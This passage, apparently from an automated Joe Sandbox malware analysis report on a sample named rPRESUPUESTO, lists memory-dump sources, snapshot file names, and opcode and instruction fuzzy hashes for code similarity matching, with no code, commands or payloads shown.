                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                • Instruction ID: 052e0562106824416a7b1194c28075b097fa86b7d161e76d6f524d876953df9b
                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                • Instruction Fuzzy Hash: 17518B71E0420AABDF15DF98C444BAFBBB9AF48350F04406DEA02AB351E774DA44CBA0
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fc46084386b5fc5a544eeb2930a7569e956f24813ddb4c9a1a745f9c63be13a3
                                                • Instruction ID: 900454a7df90818cf412ac0a7a7f541e3d2308606188d7fe9e3739b6d95e8b80
                                                • Opcode Fuzzy Hash: fc46084386b5fc5a544eeb2930a7569e956f24813ddb4c9a1a745f9c63be13a3
                                                • Instruction Fuzzy Hash: 5831B43160168E9BF322976CCD48F15BBD8BB44748F1D04A0AE45EB6D2DF2CDA80C225
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ae366bab9dc086d7d26918a0bfe1e46b9a2af73adacf5ff3a41e0f2d2985578c
                                                • Instruction ID: 0a748489578459997a992cc46169b2cef9de6705997ffccbfb6ff45224945d58
                                                • Opcode Fuzzy Hash: ae366bab9dc086d7d26918a0bfe1e46b9a2af73adacf5ff3a41e0f2d2985578c
                                                • Instruction Fuzzy Hash: 2831E476A0011AEBDB15DFD8CC44BAEB7B9FB48740F5941A9E900EB244E770EE00CB90
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6a4a01d28314d3b6b8d8da14757b791afccd9019449b2473e64d1cd7a96b4968
                                                • Instruction ID: 3b751a85a5e43c1cb340db691a61765a37d73e2f6425cc4831558dbb9ffdbcf3
                                                • Opcode Fuzzy Hash: 6a4a01d28314d3b6b8d8da14757b791afccd9019449b2473e64d1cd7a96b4968
                                                • Instruction Fuzzy Hash: 31313576A4012DABCB21DF58DD48BDEBBF9AB98350F1500A5E508E7260DA30DF918F91
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ef8863c0ef8c52ba25fe9b592257c8fc565586218889f590fa7595d3c1acb75
                                                • Instruction ID: 1b6ca5db284dd27e0c3bafeaf171ce4d6c4b4b19e1b220fba441759f280aa182
                                                • Opcode Fuzzy Hash: 2ef8863c0ef8c52ba25fe9b592257c8fc565586218889f590fa7595d3c1acb75
                                                • Instruction Fuzzy Hash: 7231B632D00219AFDB21DEA9CC44EAFF7F9EF44750F014469E616D7260D6709E008BE1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 64cf35cc2556a2c7a1a88e0c48ea21e2f175c728627688114259bfdad48be1d0
                                                • Instruction ID: 0d8a90828b9daf603fc38a2b91b905f5f2c719cebf3acf9550643bb85071070f
                                                • Opcode Fuzzy Hash: 64cf35cc2556a2c7a1a88e0c48ea21e2f175c728627688114259bfdad48be1d0
                                                • Instruction Fuzzy Hash: 6B31CA71B40A06EFDF129F69C850B6EB7F9AF44754F24406DE505DB352EA70DE018B90
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 756047849040e9b2fbd53f563cc595ce00bd0aeba5f232d35d4856205ad82ece
                                                • Instruction ID: 8345b9585cdd3e9daa8a5b5143402354030ecf7b795346a87ff6c83d5c53a231
                                                • Opcode Fuzzy Hash: 756047849040e9b2fbd53f563cc595ce00bd0aeba5f232d35d4856205ad82ece
                                                • Instruction Fuzzy Hash: 0A31F172A4471ADFC722DE688888A6BFBB5AFD4660F01452CFD59A7310DA30DC0187E1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a473adfa17d7d711339ddbdb3aecda02d96b87a76ff8f08d0d420150d9ed992
                                                • Instruction ID: 5460b38b000267bb3429facc5389004cefd3fbe7c55c6d11b6f2c8615d79d680
                                                • Opcode Fuzzy Hash: 4a473adfa17d7d711339ddbdb3aecda02d96b87a76ff8f08d0d420150d9ed992
                                                • Instruction Fuzzy Hash: 53319A716093018FE720CF19C940B2AFBE6FB88B00F58496DEA85DB351D770E948CB92
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                • Instruction ID: 06ef6703d1924d17c233f928ce64e6b30679938b965f3eda21dfa8a2565bf605
                                                • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                • Instruction Fuzzy Hash: F5312CB2B00705AFE765CF6DCD41B57BBF8AB09B50F14452DA59AC3690E630EA008B60
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: de39398c13049d4af0228de7a0eaccc4ce6453cf99ab277d7c22c20cefc52048
                                                • Instruction ID: ad6df9ee95232f620451f6946164f8371f2e433ec2ec1497bf45ff60d64ea5d2
                                                • Opcode Fuzzy Hash: de39398c13049d4af0228de7a0eaccc4ce6453cf99ab277d7c22c20cefc52048
                                                • Instruction Fuzzy Hash: BC31A7B55053018FC721DF19C58485ABBF9FB89714F0489AEE4889B316E331DA45CB82
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 172cfb8471b6799d88d10c04153deb25cc9fd3f07eb2db1e99fd6db65bda69fd
                                                • Instruction ID: a2be8ad66bf3258c7f0cc6cd447fe8170a480faf89a2f0c68ccc17ac336bad7d
                                                • Opcode Fuzzy Hash: 172cfb8471b6799d88d10c04153deb25cc9fd3f07eb2db1e99fd6db65bda69fd
                                                • Instruction Fuzzy Hash: 6331AF72A002059FD720EFA8C984A6BFBF9AB84304F148529D646E7755E730DA45DB90
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                • Instruction ID: 7c0b0d99d5ae0bd66933dd93485d0edbd22f68fb5353ef55a5d7f2c3a3937944
                                                • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                • Instruction Fuzzy Hash: A5210936E4025AAAD712DFB9C844BAFFBB5AF14740F058479DE55E7340E270CA408790
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ec443daefd51438d9c89c2f42cb7d9c0d50ca3c4deb4892cafe886aa3ce072b3
                                                • Instruction ID: 0d40c36229aaeea47d1b8f83060a6f1478217bfaf229c686f112d665b03c0e25
                                                • Opcode Fuzzy Hash: ec443daefd51438d9c89c2f42cb7d9c0d50ca3c4deb4892cafe886aa3ce072b3
                                                • Instruction Fuzzy Hash: 57312C725002118FD732AF68CC44B79BBB4AF54314F5482A9DD45DB346EA74DAC6CB90
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                • Instruction ID: d9468c06c676bf662c22468d459d9300759474d050c9c640f6b99af0206f4f46
                                                • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                • Instruction Fuzzy Hash: D8214B36600652A6CB25BBDD8C40AFABFB5EF40710F00801AFAA5C7695E734DB80C3B1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d35fc3a01e74d3c914d883eac0637bf279795bea94cc79a686168858efb42f1d
                                                • Instruction ID: 7eba61fcd820916607af931052228e921781a8cbf29965625f2069c2005b0fb0
                                                • Opcode Fuzzy Hash: d35fc3a01e74d3c914d883eac0637bf279795bea94cc79a686168858efb42f1d
                                                • Instruction Fuzzy Hash: 8F31D432A0152C9BDB31DB18DC41FEEFBB9AB15B40F0100E9F645A7290DA749F808F90
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                • Instruction ID: 9fedcdcb6a37e67c6f5e35164e6a4ce0cc59636d2847bdda1682d16fe09d4e9a
                                                • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                • Instruction Fuzzy Hash: FD219631A40609EBDB51CF98CD80A8EBBF5FF48314F108165EE25DF281E671DB058B50
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3dba93dc3897d9bbc80497d66ad017a2cd8384d3e1bfe7a04aeaf5f82d2e88b2
                                                • Instruction ID: 85b715ec7b5a6a93313d474525af6041c6892eb88d3c5ee8bd9dfe29a2478026
                                                • Opcode Fuzzy Hash: 3dba93dc3897d9bbc80497d66ad017a2cd8384d3e1bfe7a04aeaf5f82d2e88b2
                                                • Instruction Fuzzy Hash: 0D21B1726447499BC722DF18D840B6BB7E4FF88760F014619FE589B685D731EA00CBA2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                • Instruction ID: 2dfc5e871b5affec0a2f887f41aa01b800cc91eb8a2d819cb34044294af91709
                                                • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                • Instruction Fuzzy Hash: 39316931600645EFD721DBA8C884F6ABBF9EF85754F1045A9E952CB290EB30EE42CB51
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f88caf7447fd7ff9dc42e4699543708cc3815a1f4ac9f82879f85046df17894
                                                • Instruction ID: 616fdd3f9856910eb329d6c6e307c4afab0c464dd5332f97aad816a00b6c9a46
                                                • Opcode Fuzzy Hash: 2f88caf7447fd7ff9dc42e4699543708cc3815a1f4ac9f82879f85046df17894
                                                • Instruction Fuzzy Hash: FC313A75A00209DFCB14CF1CC8849AEB7B6FF88314F25446AE809DB395EB75EA50CB95
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eb4134a49fc824c6159ec2cebea2654e394ad9bc690539c52212e49655d38680
                                                • Instruction ID: cf2438377eda1b31e1152360c77f91affdbf062d9bdfe43d74683fe247f64026
                                                • Opcode Fuzzy Hash: eb4134a49fc824c6159ec2cebea2654e394ad9bc690539c52212e49655d38680
                                                • Instruction Fuzzy Hash: 19219F71A006299BCF20DF59C881ABEB7F8FF48744B504069F941EB254E739AE41CFA1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 852c16f8eecc068c396c11d9c06dabbeb5d66d66375620426788917dddced9b8
                                                • Instruction ID: 9d918f11b37db682d286dc1f75ea0aa70774806f7a75334e0659cb3091ccb912
                                                • Opcode Fuzzy Hash: 852c16f8eecc068c396c11d9c06dabbeb5d66d66375620426788917dddced9b8
                                                • Instruction Fuzzy Hash: 61219A72600649AFD716DB6CC844F6AB7E8FF58780F1400A9F944DB6A1D634EE40CBA8
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c691af68bedbae7cf9730766d0ff1547c8c8c03176870f7653a31dbc28bdbc31
                                                • Instruction ID: 8bb4f02ca65eab606494587fc27b4e708d8596e7742f2f94e9e73c5e7915a6a4
                                                • Opcode Fuzzy Hash: c691af68bedbae7cf9730766d0ff1547c8c8c03176870f7653a31dbc28bdbc31
                                                • Instruction Fuzzy Hash: 2D21B3725043469BD721DF69D948F9BFBECEF94344F080456BD80C7262D734DA44C6A2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 834ff62e7be54510d49d2d873947ba6ce0cc424b40048eb807a4bea4c7c02bcf
                                                • Instruction ID: 373b8d2c76aad4df4e95b6ecf7a225aa277df7a1ff992b040f10115367d097b3
                                                • Opcode Fuzzy Hash: 834ff62e7be54510d49d2d873947ba6ce0cc424b40048eb807a4bea4c7c02bcf
                                                • Instruction Fuzzy Hash: 2121D7316456859BE326A76CCD0CB25BBD4AB45B74F1803A8FA60DB7E2DB68C9418241
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4421fdd38ee6a3dca8a27cc9883e8cbfee54763071a42cb742837ecf97982bd2
                                                • Instruction ID: 9c24586c7ecff922126ef1e00df2b566c3ae9c9c97e4a1c41c19c6adc4299899
                                                • Opcode Fuzzy Hash: 4421fdd38ee6a3dca8a27cc9883e8cbfee54763071a42cb742837ecf97982bd2
                                                • Instruction Fuzzy Hash: B821A979210B059FC729DF29CC00B56B7F5FF08B08F248468A509CBBA1E731EA42CB94
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3ad849bf929bce839387b65842cf710540911d5e11915705c091c0b02194360
                                                • Instruction ID: 5a251ee21ff88abd2690968b1b5d369d2bd50d109104ca88b710bbc2aca8fab2
                                                • Opcode Fuzzy Hash: a3ad849bf929bce839387b65842cf710540911d5e11915705c091c0b02194360
                                                • Instruction Fuzzy Hash: E9115C76340B167FD72666999C44F27B6D9DBD5B30F210029B708CB2C0EB70DD0087A6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b711fff877be58a77b8fc5466b0d7f75149e44fbe04563e59d623378dde2fead
                                                • Instruction ID: 612260c1d7b310906ecb4c043e4fe2474bace7497eeed8cafff252555274f75b
                                                • Opcode Fuzzy Hash: b711fff877be58a77b8fc5466b0d7f75149e44fbe04563e59d623378dde2fead
                                                • Instruction Fuzzy Hash: E221C5B1E00249ABCB20DFAAD9859AEFBF8FF98700B10012EE905E7354D7749A41CB50
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                • Instruction ID: cc3d6898f2677fe04cc2246313045655a9b932b5419b99bd9809af0bc429ceb9
                                                • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                • Instruction Fuzzy Hash: EF218C72A00209EFDF129F98CC44BAEBBF9EF89310F204859F915E7251D734DA509B50
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                • Instruction ID: 4be04d102d1e26d0f803252f11b014812c448335c7b392feadf28d504b1abdcf
                                                • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                • Instruction Fuzzy Hash: 3911B273601A09AFD7239B58CC45F9ABBB9EB84794F104029F604DF1D0D671EE44CB55
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6f626c79c38065a95740176510e4891d6434d3c407508a38cb31dcd040782304
                                                • Instruction ID: 0c94b9bd7301a90da649b9f605161f6dfb8b21ae7f8291f44c4e91a0741f0b7d
                                                • Opcode Fuzzy Hash: 6f626c79c38065a95740176510e4891d6434d3c407508a38cb31dcd040782304
                                                • Instruction Fuzzy Hash: 5B11B2317006199BDB12CF8EC5C0A56FBF9EF8A720B19406EEE08DF304D6B2D9018791
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                • Instruction ID: 5be6ca1c64e00a806b1439128b80a8898edc422cf309fbe905eb66f497a7042d
                                                • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                • Instruction Fuzzy Hash: 2F219A72600B09DBD76A8F59C954A26FBE6EB94B10F10896DE546CB650C631EE00CB40
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 423266678851313ed827cf2cbf03e4e7e73e7f8560a8bc2a0a0fc0032f447e9e
                                                • Instruction ID: 739edebe0ce4a636528cb68ba59edddc3defc28f8fb2c9bf814a3cee67ca6432
                                                • Opcode Fuzzy Hash: 423266678851313ed827cf2cbf03e4e7e73e7f8560a8bc2a0a0fc0032f447e9e
                                                • Instruction Fuzzy Hash: 54215E75A00209DFCB14CF68C581A6EFBF6FB88318F2441ADD105AB351D772AD0ACB91
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f18fd598d56252fc67d09ee6fb5da67f248a75717f8db97f2520939c5bf4922
                                                • Instruction ID: ecd4afd26bdc158e03ee4c8b3b842853f266aa3224ed477483f014f4bfbda6ef
                                                • Opcode Fuzzy Hash: 2f18fd598d56252fc67d09ee6fb5da67f248a75717f8db97f2520939c5bf4922
                                                • Instruction Fuzzy Hash: 99219075500A04EFD7618F68CC41F66B7F8FF84754F10892DE59AC7290EA30AA60CB60
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 96a8d1ddeba09514a3d9ecb21740c586ace7c2120341e73ed1b33b966695a170
                                                • Instruction ID: 368b2d2922be565767526f874c4d9c7d4bf2e051d1a90bd313a83054a897c857
                                                • Opcode Fuzzy Hash: 96a8d1ddeba09514a3d9ecb21740c586ace7c2120341e73ed1b33b966695a170
                                                • Instruction Fuzzy Hash: 861125327001149BCB1ACB28CC84A6BB296EFD5770B39493CEB22CB390ED30C912C291
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b8e16344b070f1b2e3d29bbdcd1f67237974e8437dc68ca352c41d41adf15451
                                                • Instruction ID: cf1f9cd95f7e81d883e4e8b6854b4224ca2c4009609e173de189a8a4899ee57c
                                                • Opcode Fuzzy Hash: b8e16344b070f1b2e3d29bbdcd1f67237974e8437dc68ca352c41d41adf15451
                                                • Instruction Fuzzy Hash: B2119472240558EFC722DB6DC944F9AB7ACEF99754F214029F605DB261EA70EA01CB90
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9922d4246696254b42e29ec17f9f5a87dfee990f3562fe7ad498e58b0323e0d5
                                                • Instruction ID: d014ddbf0dcbc3b06c31f164efeded25d4612fe35dc79b8a1fc6b672e98b7dcd
                                                • Opcode Fuzzy Hash: 9922d4246696254b42e29ec17f9f5a87dfee990f3562fe7ad498e58b0323e0d5
                                                • Instruction Fuzzy Hash: F311C176A0120ADFCB66CF59C984A5ABBF8AF88710B218279D905DB355F670DE10CB90
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                • Instruction ID: c0c91b8c2f706935af9379237b9482e699097a7e5275077c3391f1fb504d4e0f
                                                • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                • Instruction Fuzzy Hash: CA11B236A00919AFDF19CB58C805A9DBBF5FF84314F098269EC55E7380E675AE51CB80
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
